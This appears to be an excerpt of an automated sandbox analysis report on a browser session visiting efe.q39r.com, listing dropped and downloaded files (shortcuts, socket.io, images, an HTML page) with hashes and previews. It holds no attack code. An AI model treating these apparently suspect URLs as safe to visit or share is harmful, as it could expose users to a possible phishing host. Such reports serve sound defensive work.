                                                                                  • Excluded IPs from analysis (whitelisted): 74.125.136.94, 74.125.136.113, 74.125.136.100, 74.125.136.139, 74.125.136.138, 74.125.136.102, 74.125.136.101, 142.250.105.84, 34.104.35.123, 23.40.205.81, 192.229.211.108, 199.232.210.172, 64.233.177.94, 64.233.177.95, 64.233.176.95, 108.177.122.95, 172.217.215.95, 142.251.15.95, 64.233.185.95, 173.194.219.95, 74.125.136.95, 172.253.124.95, 142.250.9.95, 142.250.105.95, 74.125.138.95, 142.250.9.113, 142.250.9.138, 142.250.9.101, 142.250.9.100, 142.250.9.102, 142.250.9.139, 64.233.176.94, 23.40.205.73, 64.233.185.101, 64.233.185.113, 64.233.185.138, 64.233.185.100, 64.233.185.139, 64.233.185.102
                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, evoke-windowsservices-tas.msedge.net, update.googleapis.com, clients.l.google.com, www.gstatic.com
                                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  No simulations
                                                                                  No context
                                                                                  No context
                                                                                  No context
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 15:22:54 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2677
                                                                                  Entropy (8bit):3.9954136896969175
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:81Qmd0jTh7+TH1nidAKZdA1JehwiZUklqehoxy+3:81QdjoJ1zy
                                                                                  MD5:7C2F7D6E0C5023369362CB1C5B87554C
                                                                                  SHA1:521B9671B1A92BF71D0343DEFB36C2E9D0141618
                                                                                  SHA-256:C2C5035BB73559FFB63DBEE431603A29D97602819827DB9005D25B08CC11EF05
                                                                                  SHA-512:6A1DBA30FAC7861FE9A0163B2E459CD1154DF772A3D16EF3A98DA5A83220AFF11D0E613768DF6ABF6F5E450E40DDA913AD2CECBC128EBA93B47F7F3252E18160
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,....WN_.,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>..[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 15:22:54 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2679
                                                                                  Entropy (8bit):4.01369675409374
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8Bmd0jTh7+TH1nidAKZdA10eh/iZUkAQkqehZxy+2:8BdjoJ/9QCy
                                                                                  MD5:BF32A643E54F534A350FB939BC589715
                                                                                  SHA1:A6411F899D27ACB3610B51D7A195315551A2EF3E
                                                                                  SHA-256:4B60B4FF4CB5F792B72C7E582853A4D0BCBC064D8781F6A4D4FB32109936250F
                                                                                  SHA-512:1A3F00C4712F7D8EFDF9340943566179E11BC99F70736DA9CA173889A27BDF628F317D607A75653A87534D7A8F5FA30454C55C968D59930DB020AF36661F4405
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,.....kQ.,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>..[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2693
                                                                                  Entropy (8bit):4.022194394629921
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8emd0jTh7+jH1nidAKZdA14tIeh7sFiZUkmgqeh7sXxy+BX:8edjo5Pn3y
                                                                                  MD5:30479E1DA20A125E1DF4A4BE1F3E4B78
                                                                                  SHA1:1FA06759F62818A6FB76D6C35FD60D656686C8CF
                                                                                  SHA-256:A4AE0118F4673DFCC06C594360ECFACDB95391E53274CFD5EB5B3B4D45B538CC
                                                                                  SHA-512:31AF2532B8F37DA340D94677F53660FD0C161A534822DA4866FAD8F03C1F66EDBFF3811928D526361BD3B995812D66D852ABC5D9CEBD5A6EEF4B2D186385E30E
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>..[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 15:22:54 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2681
                                                                                  Entropy (8bit):4.010963570130369
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8Bmd0jTh7+TH1nidAKZdA1behDiZUkwqehdxy+R:8BdjoJMpy
                                                                                  MD5:F0010980EBE9B47AEAD55EBCBBD699E3
                                                                                  SHA1:26302F4CAFCBBC0151EEBB8A2CE25A591D957CD1
                                                                                  SHA-256:4DA953A7CEED55EF92F6680E97C056B7C474E7E7209F454CADE913FFF3336EDF
                                                                                  SHA-512:71710D1DBD9FE065CD3B87D334F844496B00F24D64884122F61838E4A96B21053B7AFA08B1015DEF2C52D36779C0DB4FA0781EF75C452613CD0070DDBD4E89F6
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,....(xK.,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>..[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 15:22:54 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2681
                                                                                  Entropy (8bit):4.000269312282804
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8/md0jTh7+TH1nidAKZdA1VehBiZUk1W1qehTxy+C:8/djoJc9ly
                                                                                  MD5:8EF752B2C038F09C62EE254E65458EA3
                                                                                  SHA1:99C2FFC6957223EE0BD9A9EC7750C5D34F1762D0
                                                                                  SHA-256:FA894277DE105E233EE8CF88013EA25DAD0C11781FDF086FE9651F2EF3715D16
                                                                                  SHA-512:8379A259413210D244249E872803456E3D248D6163F2D9C8B6556EF04965474A17B5F42E4B5219996A81F091CD475476F34566157F7584AB71AEE86480AF3CAE
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,......Y.,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>..[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 15:22:53 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2683
                                                                                  Entropy (8bit):4.014838680305894
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8vmd0jTh7+TH1nidAKZdA1duT6ehOuTbbiZUk5OjqehOuTblxy+yT+:8vdjoJWTTTbxWOvTb3y7T
                                                                                  MD5:B6EFB1B5DF79A0EFE7F552DA2704F9E3
                                                                                  SHA1:E2E491FB13EA603D7FF3C5AB03EEC8E1CAB5E91D
                                                                                  SHA-256:C4759798E2CBA2CC94FC6B35FBB3B639D908A590ADC3A14AFF1A57EA3660706B
                                                                                  SHA-512:1BB018D9D02C2A4B067E4E9E242B3ADD8884478FBAD13487D37B1ABAB3AE11671FD5B231FD594A6DC03E72C81BA1498214CFBBB5D6FB41A8ABA7B8A6903EF006
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,......B.,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>..[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (45667)
                                                                                  Category:downloaded
                                                                                  Size (bytes):45806
                                                                                  Entropy (8bit):5.207605835316031
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                                                  MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                                                  SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                                                  SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                                                  SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                                                                  Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 1115 x 700, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):79750
                                                                                  Entropy (8bit):7.954235362439607
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:d1EggIgQfGfPhDMDBFWvC+tFt41M7h5Z4vke5os2+CX/sj4KzD2Rkit38:d1EgEcQ6BFWS1kF4vke54+AYleRvt38
                                                                                  MD5:ACAF77D5AC2A60843A177E3D0581CC1E
                                                                                  SHA1:E0311D76E36490BFC9EB94FCB76B2811247F07D7
                                                                                  SHA-256:D16BE881B067A5038E9AB84AAA56C49D8B712CBA0FD5F7FA15C0AF06605DBF8A
                                                                                  SHA-512:5CA473F340BC9CC224205C71D262DDC24B0A660E650B29337CEF11538E96BA2B4374556DAC3ACB3D6BA085D8B0E1B03400FB20C316C7DBB06EE019C17C73F860
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/pqlrdvXLDxx8n6V4MJcB2ydokZwphsRQHgstygzowxnkE7IJ6fkdR23LED0BEqORerGVIm4SyEOoIaiiUvfdh4OuMUbyF2Lroiop420
                                                                                  Preview:.PNG........IHDR...[..........S'_....iCCPicc....c``<...,....y%EA.N...Q.............p...o. j/..Q..p...'...@.R...h...-..ak..I....]^RP.d...E!A.@v......NBb'.......6.9...w3....i. .a(f.bpgp....$.....W...........[..$n!.T.00.00l;..C.IAbQ"X........>-g`..d`..........nS...!....r.R."..y...z@.....!.....??....... cHRM..z&..............u0...`..:....p..Q<....bKGD.............=zTXtRaw profile type icc..(..S.. ....-..$.$$H......l..... 9f..L..9.*X4@E..&......l...d....h'.:.4*....FV\5\.w..W..e...b...(#....}/4..qLg.-...3....D.......Q..&.x...t./.p...L.}.&...qz.U....0[q....{..x...ZVlD.J..xL.e..fIz..z........Z.4.'.:/p........?..TG;.k..]ZE.....<...`..o....w.3-c.W..T.I......c..CNN....^.g.(......orNT..w.....IDATx....r..5.9...n.>aG.a_...wt^u..j....Y...nI-i...|...D....gV~....?.#......... ..w....'......}yk.Z ............?.......?...._....x..|............7'.-.Zk........o|...JR...Y.._...w..~dZk...Zk.?f.....?.@...b.{........i......Zk......rA.v._......e.[...Zk.......j...Zk.......9..W...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:downloaded
                                                                                  Size (bytes):7390
                                                                                  Entropy (8bit):4.02755241095864
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                                  MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                  SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                  SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                  SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/ij50onkMRoXybYnI2RW73cdrhB5AKLQ1WQTq7e8mc2L3pvwh78164
                                                                                  Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):231
                                                                                  Entropy (8bit):6.725074433303473
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                                                  MD5:547988BAC5584B4608466D761E16F370
                                                                                  SHA1:C11BB71049702528402A31027F200184910A7E23
                                                                                  SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                                                  SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/uvZWUFt0UROOoXt5vmcKSao6QR2TqrxxiF9by3n8nEXUy2s5T34126
                                                                                  Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):70712
                                                                                  Entropy (8bit):6.94130504124589
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                                                  MD5:F70FF06D19498D80B130EC78176FD3FF
                                                                                  SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                                                  SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                                                  SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):49602
                                                                                  Entropy (8bit):7.881935507115631
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                                                  MD5:DB783743CD246FF4D77F4A3694285989
                                                                                  SHA1:B9466716904457641B7831868B47162D8D378D41
                                                                                  SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                                                  SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/ghZkYyc0mYIKciokhMyZ3rmnOyD3C9NSbJEMXI7KFs37Tbx9uncef210
                                                                                  Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with very long lines (59521), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):59888
                                                                                  Entropy (8bit):5.778836460484456
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:5FO9BMpDaLo9k2h+JczL2ezL22hLg3jhlC+abh1wNPRlxg63fVS:5FEBpLo9kK+YL2WL2WYrC+JN5vg68
                                                                                  MD5:E9FA9E353C05711795BBD6E0DFF6C591
                                                                                  SHA1:5F2CFBE103C1D99382EF76FFE1ACCC42EACB4452
                                                                                  SHA-256:8323530463A2381102BB8812437974F29CFA073629DDB39D9311A09DD85980AD
                                                                                  SHA-512:96DD4CA22401071C647B4F701915E25DCC5684A133CBCEEB5150B703B712241F535F3682C8DED7D46F2D5A1F6BEC210A4111EDFE8082C280E49DE6B1E14DD089
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
